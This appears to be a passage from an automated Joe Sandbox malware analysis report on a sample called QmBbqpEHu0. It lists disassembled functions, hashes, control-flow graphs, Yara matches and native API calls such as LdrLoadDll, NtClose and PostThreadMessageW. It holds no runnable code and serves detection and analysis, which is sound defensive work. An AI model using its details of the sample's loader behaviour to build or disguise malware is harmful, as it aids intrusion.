                                                                                                                                      • Instruction ID: 2ae185cd2b492e56b8728f5cb794da9aad485b2e0884a3d94b81fe88e74ec61b
                                                                                                                                      • Opcode Fuzzy Hash: 8032a78ba2afd40d85fa08fec7f4d525a65a3cacd7dc32e3276acd785b8c9bf2
                                                                                                                                      • Instruction Fuzzy Hash: 5F41E3B0E0520ADFCB08CFAAD5816EEFBF2AF89200F14C46AD415A7254D7349A42CF94
                                                                                                                                      Function 0747AC10 Relevance: .1, Instructions: 101COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 314ebd7c6d678ea7c2ceaa1248dd3fa0f78ee37a290936b25d8886537e80e916
                                                                                                                                      • Instruction ID: b7ee99ec3952ecf8da4bc97e3f889c6ceef243295be29e7427df2f97a82044fc
                                                                                                                                      • Opcode Fuzzy Hash: 314ebd7c6d678ea7c2ceaa1248dd3fa0f78ee37a290936b25d8886537e80e916
                                                                                                                                      • Instruction Fuzzy Hash: 5241BEB0E0560ADFCB48CFAAC5815EEFBF2AF89200F24D46AD415B7254D7359A42CF94
                                                                                                                                      Function 07475A60 Relevance: .1, Instructions: 66COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3616257614.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_7470000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2ee806a34df8d492e7c33de58c81022605fac6c4f1b5321a8a2a1dd7b3f1d091
                                                                                                                                      • Instruction ID: 4c9fe4dc80bc1e49775f24b610076318b56d00b642083b27485f364e9fd31181
                                                                                                                                      • Opcode Fuzzy Hash: 2ee806a34df8d492e7c33de58c81022605fac6c4f1b5321a8a2a1dd7b3f1d091
                                                                                                                                      • Instruction Fuzzy Hash: B421EFB1E046189BEB58CFABD8406DEFBF7AFC9200F05C076D518A6254EB3405568F55

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:1.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                                      Signature Coverage:7.5%
                                                                                                                                      Total number of Nodes:146
                                                                                                                                      Total number of Limit Nodes:13
                                                                                                                                      execution_graph 91981 1002b60 LdrInitializeThunk 91982 4253c3 91984 4253dc 91982->91984 91983 425424 91990 42ee73 91983->91990 91984->91983 91987 425464 91984->91987 91989 425469 91984->91989 91988 42ee73 RtlFreeHeap 91987->91988 91988->91989 91993 42d113 91990->91993 91992 425434 91994 42d12d 91993->91994 91995 42d13e RtlFreeHeap 91994->91995 91995->91992 91996 42ff13 91997 42ff23 91996->91997 91998 42ff29 91996->91998 92001 42ef53 91998->92001 92000 42ff4f 92004 42d0c3 92001->92004 92003 42ef6e 92003->92000 92005 42d0dd 92004->92005 92006 42d0ee RtlAllocateHeap 92005->92006 92006->92003 92007 425033 92008 42504f 92007->92008 92009 425077 92008->92009 92010 42508b 92008->92010 92011 42cd93 NtClose 92009->92011 92017 42cd93 92010->92017 92013 425080 92011->92013 92014 425094 92020 42ef93 RtlAllocateHeap 92014->92020 92016 42509f 92018 42cdb0 92017->92018 92019 42cdc1 NtClose 92018->92019 92019->92014 92020->92016 92021 42c393 92022 42c3b0 92021->92022 92025 1002df0 LdrInitializeThunk 92022->92025 92023 42c3d8 92025->92023 92026 414613 92032 4145e8 92026->92032 92027 4145f8 92028 41466d 92029 414690 92028->92029 92031 414684 PostThreadMessageW 92028->92031 92031->92029 92032->92027 92032->92028 92033 417dc3 92032->92033 92034 417de7 92033->92034 92035 417e23 LdrLoadDll 92034->92035 92036 417dee 92034->92036 92035->92036 92036->92032 92037 419433 92038 419463 92037->92038 92040 41948f 92038->92040 92041 41b903 92038->92041 92042 41b947 92041->92042 92043 41b968 92042->92043 92044 42cd93 NtClose 92042->92044 92043->92038 92044->92043 92045 41ab93 92046 41ac05 92045->92046 92047 41abab 92045->92047 92047->92046 92049 41eb03 92047->92049 92050 41eb29 92049->92050 92054 41ec20 92050->92054 92055 430043 92050->92055 92052 41ebbe 92052->92054 92061 42c3e3 92052->92061 92054->92046 92056 42ffb3 92055->92056 92057 430010 92056->92057 92058 42ef53 RtlAllocateHeap 92056->92058 92057->92052 92059 42ffed 92058->92059 92060 42ee73 RtlFreeHeap 92059->92060 92060->92057 92062 42c400 92061->92062 92065 1002c0a 92062->92065 92063 42c42c 92063->92054 92066 1002c11 92065->92066 92067 1002c1f LdrInitializeThunk 92065->92067 92066->92063 92067->92063 92068 401b38 92069 401b43 92068->92069 92072 4303e3 92069->92072 92075 42ea23 92072->92075 92076 42ea49 92075->92076 92087 407533 92076->92087 92078 42ea5f 92086 401bfa 92078->92086 92090 41b713 92078->92090 92080 42ea93 92101 428923 92080->92101 92081 42ea7e 92081->92080 92105 42d163 92081->92105 92084 42eaad 92085 42d163 ExitProcess 92084->92085 92085->92086 92089 407540 92087->92089 92108 416a63 92087->92108 92089->92078 92091 41b73f 92090->92091 92119 41b603 92091->92119 92094 41b784 92097 41b7a0 92094->92097 92099 42cd93 NtClose 92094->92099 92095 41b76c 92096 41b777 92095->92096 92098 42cd93 NtClose 92095->92098 92096->92081 92097->92081 92098->92096 92100 41b796 92099->92100 92100->92081 92102 428985 92101->92102 92104 428992 92102->92104 92130 418c33 92102->92130 92104->92084 92106 42d17d 92105->92106 92107 42d18e ExitProcess 92106->92107 92107->92080 92110 416a80 92108->92110 92109 416a99 92109->92089 92110->92109 92112 42d813 92110->92112 92114 42d82d 92112->92114 92113 42d85c 92113->92109 92114->92113 92115 42c3e3 LdrInitializeThunk 92114->92115 92116 42d8bc 92115->92116 92117 42ee73 RtlFreeHeap 92116->92117 92118 42d8d5 92117->92118 92118->92109 92120 41b61d 92119->92120 92124 41b6f9 92119->92124 92125 42c483 92120->92125 92123 42cd93 NtClose 92123->92124 92124->92094 92124->92095 92126 42c49d 92125->92126 92129 10035c0 LdrInitializeThunk 92126->92129 92127 41b6ed 92127->92123 92129->92127 92131 418c5d 92130->92131 92137 41916b 92131->92137 92138 414283 92131->92138 92133 418d8a 92134 42ee73 RtlFreeHeap 92133->92134 92133->92137 92135 418da2 92134->92135 92136 42d163 ExitProcess 92135->92136 92135->92137 92136->92137 92137->92104 92142 4142a3 92138->92142 92140 41430c 92140->92133 92142->92140 92143 41ba23 92142->92143 92144 41ba48 92143->92144 92150 42a0c3 92144->92150 92146 41ba79 92147 414302 92146->92147 92149 42ee73 RtlFreeHeap 92146->92149 92155 41b863 LdrInitializeThunk 92146->92155 92147->92133 92149->92146 92152 42a128 92150->92152 92151 42a15b 92151->92146 92152->92151 92156 4140e3 92152->92156 92154 42a13d 92154->92146 92155->92146 92157 4140a8 92156->92157 92160 414112 92156->92160 92161 42d023 92157->92161 92162 42d040 92161->92162 92165 1002c70 LdrInitializeThunk 92162->92165 92163 4140c5 92163->92154 92165->92163

                                                                                                                                      Executed Functions

                                                                                                                                      Function 00417DC3 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 329 417dc3-417dec call 42fa53 332 417df2-417e00 call 430053 329->332 333 417dee-417df1 329->333 336 417e10-417e21 call 42e4f3 332->336 337 417e02-417e0d call 4302f3 332->337 342 417e23-417e37 LdrLoadDll 336->342 343 417e3a-417e3d 336->343 337->336 342->343
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction ID: 2f2cbff0a24190b22dfd2152e99f66e997f339ee9ba054a098c76015c184d67c
                                                                                                                                      • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction Fuzzy Hash: D70175B1E0020DA7DF10DBE5DC42FDEB7B8AB54308F0081A6E90897240F634EB548B95
                                                                                                                                      Function 0042CD93 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 354 42cd93-42cdcf call 404943 call 42e003 NtClose
                                                                                                                                      APIs
                                                                                                                                      • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CDCA
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3535843008-0
                                                                                                                                      • Opcode ID: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                      • Instruction ID: b915159f885522db5443b9e3ff62b849829641cf8f4aa2f019e369742d55ea9e
                                                                                                                                      • Opcode Fuzzy Hash: 1737473a9a3b8e2f9b3aa77562bc1deab7213942193e90c362335c3f221bbf7d
                                                                                                                                      • Instruction Fuzzy Hash: 96E04F713002547BD220EA6ADC01FAB775CDBC5714F00445AFA18A7181D7B5B90186E4
                                                                                                                                      Function 01002B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 799d2144ba4fd47111ef188a0e4eb11960ceb2b5e9a37822072adbadaef7b09c
                                                                                                                                      • Instruction ID: 0cc426c2d1e9fa6768d386fb94643cd85fe2e358ef3c29a4314e988b2cafd261
                                                                                                                                      • Opcode Fuzzy Hash: 799d2144ba4fd47111ef188a0e4eb11960ceb2b5e9a37822072adbadaef7b09c
                                                                                                                                      • Instruction Fuzzy Hash: 0A90026224240003510571588414616500A97E1201B95C022E1414590DC6298A916225
                                                                                                                                      Function 01002DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 6c72ef69b68bebb47f41fedf33ba72c43464fa1ae8b2c22c7843afbc48aa8699
                                                                                                                                      • Instruction ID: d2b7a1ee82d7afa17b8f0a1f38e232f0cf3ea1874ec52561f69316ecdcd1aaec
                                                                                                                                      • Opcode Fuzzy Hash: 6c72ef69b68bebb47f41fedf33ba72c43464fa1ae8b2c22c7843afbc48aa8699
                                                                                                                                      • Instruction Fuzzy Hash: 4D90023224140413E11171588504707100997D1241FD5C413A0824558DD75A8B52A221
                                                                                                                                      Function 01002C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 718871ee858764af645dc34be0ba9289d86e797a57e4ae3b31c2cbd21fe83659
                                                                                                                                      • Instruction ID: 1f34e2f78afb672d425fec4e8975d048f3d879e3a34a2c95b40b0686c9cffc75
                                                                                                                                      • Opcode Fuzzy Hash: 718871ee858764af645dc34be0ba9289d86e797a57e4ae3b31c2cbd21fe83659
                                                                                                                                      • Instruction Fuzzy Hash: A690023224148803E1107158C40474A100597D1301F99C412A4824658DC7998A917221
                                                                                                                                      Function 010035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285918657.0000000000F90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_f90000_QmBbqpEHu0.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 4ba40549165ef3a676a1eada3ca5b40e96a494edfab552d7e206c7f3c0c1f4bb
                                                                                                                                      • Instruction ID: 627a26d14b56bf02bd4a714ef9ab365f09276e7adeb7585be0e21c2d4f9b9b86
                                                                                                                                      • Opcode Fuzzy Hash: 4ba40549165ef3a676a1eada3ca5b40e96a494edfab552d7e206c7f3c0c1f4bb
                                                                                                                                      • Instruction Fuzzy Hash: 6790023264550403E10071588514706200597D1201FA5C412A0824568DC7998B5166A2
                                                                                                                                      Function 004145C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 0 4145c0-4145cb 1 4145bb-4145bc 0->1 2 4145cd-4145d2 0->2 3 4145a4 2->3 4 4145d4-4145e6 2->4 5 414616-414628 call 42ef13 3->5 6 4145a6-4145ac 3->6 7 4145e8-4145f0 4->7 8 41462a-414633 call 42f923 4->8 5->8 11 414612 7->11 12 4145f2-4145f4 7->12 15 414634 8->15 13 414614 11->13 14 414669-41466c 11->14 16 414601-414607 12->16 17 4145f6 12->17 13->5 19 414635-414666 call 417dc3 call 4048b3 call 425503 14->19 20 41466d-41467d 14->20 15->7 17->15 18 4145f8-414600 17->18 18->16 19->14 21 41469d-4146a3 20->21 22 41467f-41468e PostThreadMessageW 20->22 22->21 26 414690-41469a 22->26 26->21
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 8db3aa977ed821cc02c9b9755325aba191a82c2463bed7ddff3301cc46a87eeb
                                                                                                                                      • Instruction ID: a38a19859597c4e6e1d47c24a67c1ad7e9950002486cad7920d3763165c054a8
                                                                                                                                      • Opcode Fuzzy Hash: 8db3aa977ed821cc02c9b9755325aba191a82c2463bed7ddff3301cc46a87eeb
                                                                                                                                      • Instruction Fuzzy Hash: 62318E7290114C7FDB10DAA4AC81DEF7B6CAB9235CF04402FF904A7241E12D8E4687EA
                                                                                                                                      Function 00414595 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 72threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 31 414595-4145a4 33 414616-414633 call 42ef13 call 42f923 31->33 34 4145a6-4145ac 31->34 38 414634 33->38 40 414612 38->40 41 4145f2-4145f4 38->41 42 414614 40->42 43 414669-41466c 40->43 44 414601-414607 41->44 45 4145f6 41->45 42->33 47 414635-414666 call 417dc3 call 4048b3 call 425503 43->47 48 41466d-41467d 43->48 45->38 46 4145f8-414600 45->46 46->44 47->43 49 41469d-4146a3 48->49 50 41467f-41468e PostThreadMessageW 48->50 50->49 54 414690-41469a 50->54 54->49
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 3381644c3cf99aabc76e807d659441e64835fb64e4ffc46ed3a73b671cb8bf04
                                                                                                                                      • Instruction ID: 84db4ab4c16e3a995e9550d55e013f9a162ef2d0504a0c2f815f3073e6ddb3a0
                                                                                                                                      • Opcode Fuzzy Hash: 3381644c3cf99aabc76e807d659441e64835fb64e4ffc46ed3a73b671cb8bf04
                                                                                                                                      • Instruction Fuzzy Hash: DA112772D0115C7AEB10AAA19C82EEF7B7CDF82398F454069FA04B7242D63C4E0687B1
                                                                                                                                      Function 0041460A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 59 41460a-41460e 60 414610 59->60 61 414684-41468e PostThreadMessageW 59->61 62 414612 60->62 63 414690-41469a 61->63 64 41469d-4146a3 61->64 65 414614-414633 call 42ef13 call 42f923 62->65 66 414669-41466c 62->66 63->64 77 414634 65->77 67 414635-414666 call 417dc3 call 4048b3 call 425503 66->67 68 41466d-41467d 66->68 67->66 68->64 70 41467f-414683 68->70 70->61 77->62 81 4145f2-4145f4 77->81 83 414601-414607 81->83 84 4145f6 81->84 84->77 85 4145f8-414600 84->85 85->83
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 8e504f57ca564d4671762f9b9801edcb6fc5564ea8acf1417db21949e0a90039
                                                                                                                                      • Instruction ID: 2f14aeb2a968f37d35cd1fc421451ae93ea76f2936ae965c16d40e7cd684983a
                                                                                                                                      • Opcode Fuzzy Hash: 8e504f57ca564d4671762f9b9801edcb6fc5564ea8acf1417db21949e0a90039
                                                                                                                                      • Instruction Fuzzy Hash: 37110672D0021C7AEB10AAE19C81DEF7B7CDF81358F41802AFA0467101D57C4E0687B5
                                                                                                                                      Function 00414613 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 86 414613-414614 87 414616-414633 call 42ef13 call 42f923 86->87 91 414634 87->91 93 414612 91->93 94 4145f2-4145f4 91->94 95 414614 93->95 96 414669-41466c 93->96 97 414601-414607 94->97 98 4145f6 94->98 95->87 100 414635-414646 call 417dc3 96->100 101 41466d-41467d 96->101 98->91 99 4145f8-414600 98->99 99->97 106 41464b-414666 call 4048b3 call 425503 100->106 102 41469d-4146a3 101->102 103 41467f-41468e PostThreadMessageW 101->103 103->102 107 414690-41469a 103->107 106->96 107->102
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 0041468A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 75b64f5f9338c3b0d63f75708259dbdd9b7bbbbadf4148c30b6a70576e27ca1c
                                                                                                                                      • Instruction ID: b1f2822fdde1a8a37edeeec6d97a4a6f8e628c87287faab8aeed485a3d20c385
                                                                                                                                      • Opcode Fuzzy Hash: 75b64f5f9338c3b0d63f75708259dbdd9b7bbbbadf4148c30b6a70576e27ca1c
                                                                                                                                      • Instruction Fuzzy Hash: 7701A571D0011C7AEB10AAE19C81EEF7B7C9F41358F418069FA0467141D57C4E0687B5
                                                                                                                                      Function 00417DB6 Relevance: 1.6, APIs: 1, Instructions: 86libraryloaderCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 300 417db6-417dbe 302 417dc1 300->302 303 417dfb-417e00 300->303 304 417dc3-417dec call 42fa53 302->304 305 417d74-417d7a 302->305 306 417e10-417e21 call 42e4f3 303->306 307 417e02-417e0d call 4302f3 303->307 317 417df2-417df6 call 430053 304->317 318 417dee-417df1 304->318 309 417d73-417d7a 305->309 310 417d7c-417d8d call 417ae3 305->310 320 417e23-417e37 LdrLoadDll 306->320 321 417e3a-417e3d 306->321 307->306 309->309 309->310 323 417db2-417db5 310->323 324 417d8f-417d93 310->324 317->303 320->321 325 417d96-417d9d 324->325 325->325 326 417d9f-417da2 325->326 326->323 327 417da4-417da6 326->327 328 417da9-417db0 327->328 328->323 328->328
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417E35
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: e92e2bd8e92d6cf6769027d0a7ab914c286abf308111735771e30c1c5e85870c
                                                                                                                                      • Instruction ID: 768e9a2dea899310e52eb886fb54352dee10bc69cabf07a1c405106990d73114
                                                                                                                                      • Opcode Fuzzy Hash: e92e2bd8e92d6cf6769027d0a7ab914c286abf308111735771e30c1c5e85870c
                                                                                                                                      • Instruction Fuzzy Hash: BF212775E0810E6BDB10EB54E841EFEB775AF51308F04419BE84887241F63AAA99C765
                                                                                                                                      Function 0042D0C3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 344 42d0c3-42d104 call 404943 call 42e003 RtlAllocateHeap
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(?,0041EBBE,?,?,00000000,?,0041EBBE,?,?,?), ref: 0042D0FF
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                      • Instruction ID: bd14d76cccbd5b5b5072585d725f183bb722e8bbb970f0ac88227b98fc761909
                                                                                                                                      • Opcode Fuzzy Hash: eae60f949f5d12015151136e4b213714b0ff1f3c610ce3c3bf1f382d234a3899
                                                                                                                                      • Instruction Fuzzy Hash: 54E092B13043147BC610EE6ADC85F9B73ACEFC9718F000419FA08A7241D775B9108BB8
                                                                                                                                      Function 0042D113 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 349 42d113-42d154 call 404943 call 42e003 RtlFreeHeap
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,00417628,000000F4), ref: 0042D14F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: fbcce9ac393ef9d6e8187d69ea3e8cd08d51942079d650599fc94455718920a1
                                                                                                                                      • Instruction ID: 5a24fe1c8667838e1b86e8c9ddda84145e04184eafb81871ef1f6178e643cdb2
                                                                                                                                      • Opcode Fuzzy Hash: fbcce9ac393ef9d6e8187d69ea3e8cd08d51942079d650599fc94455718920a1
                                                                                                                                      • Instruction Fuzzy Hash: 60E06DB23042147BD610EE5ADC45E9B77ACEFC5714F000019F908A7241D675B9118AB5
                                                                                                                                      Function 0042D163 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 359 42d163-42d19c call 404943 call 42e003 ExitProcess
                                                                                                                                      APIs
                                                                                                                                      • ExitProcess.KERNEL32(?,00000000,00000000,?,C8E77539,?,?,C8E77539), ref: 0042D197
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000004.00000002.2285582788.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_QmBbqpEHu0.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExitProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                      • Opcode ID: 0784899f664b46459984781d242e4c204c322996c6f648afae983b60901c4e29
